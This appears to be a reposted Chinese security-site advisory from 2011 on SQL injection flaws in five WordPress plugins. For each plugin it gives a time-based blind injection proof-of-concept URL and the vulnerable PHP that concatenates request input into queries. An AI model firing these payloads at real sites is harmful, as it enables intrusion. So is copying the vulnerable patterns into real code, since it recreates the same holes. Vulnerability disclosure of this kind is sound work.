首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
WordPress多个插件注入漏洞
来源:http://www.luoyes.com 作者:落叶 发布时间:2011-08-22  
1:
OdiHost Newsletter plugin <= 1.0
POC:
http://www.site.com/wp-content/plugins/odihost-newsletter-plugin/includes/openstat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

漏洞代码:
$newsletterid = $_GET["id"];
...
$wpdb->query("update newsletterstat set newsletterstatopened = CONCAT(newsletterstatopened ,'". $subscriberid . ",') where newsletterstatnewsletterid= ". $newsletterid);

2:
Easy Contact Form Lite plugin <= 1.0.7
POC:
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php
field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
漏洞代码:
foreach ($_POST['field_num'] as $position=>$field_id) {
    
    if ($field_id > 0) {
        $query = "
            UPDATE $settings_table_name
            SET position = '".$position."'
            WHERE ID = $field_id";
        $wpdb->query($query);
    }

3:
WP Symposium plugin <= 0.64
POC:
http://localhost/wp-content/plugins/wp-symposium/uploadify/get_profile_avatar.php?uid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
漏洞代码:
$uid = $_REQUEST['uid'];
$sql = "SELECT profile_avatar FROM ".$wpdb->base_prefix."symposium_usermeta WHERE uid = ".$uid;


4:
Contus HD FLV Player plugin <= 1.3
POC:
http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1
漏洞代码:
$pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) :
    mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;

5:
File Groups plugin <= 1.1.2
POC:
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))
漏洞代码:
$fgid = $_GET['fgid'];
...
$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Bo-Blog v1.4 单用户版分类列表
·discuz sessoin hijack tips 续
·Nginx %00空字节执行php漏洞
·discuz sessoin hijack tips
·EasySiteEdit远程文件包含缺陷及
·DEDECMS全局变量覆盖漏洞科普
·PHP168 V6.02 整站系统远程执行
·WordPress 严重的远程备份执行代
·DEDECMS拿SHELL EXP
·DEDECMS爆严重安全漏洞 免账号密
·PHP 跨目录档案上传漏洞
·智有道专业旅游系统 v1.0 注入及
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved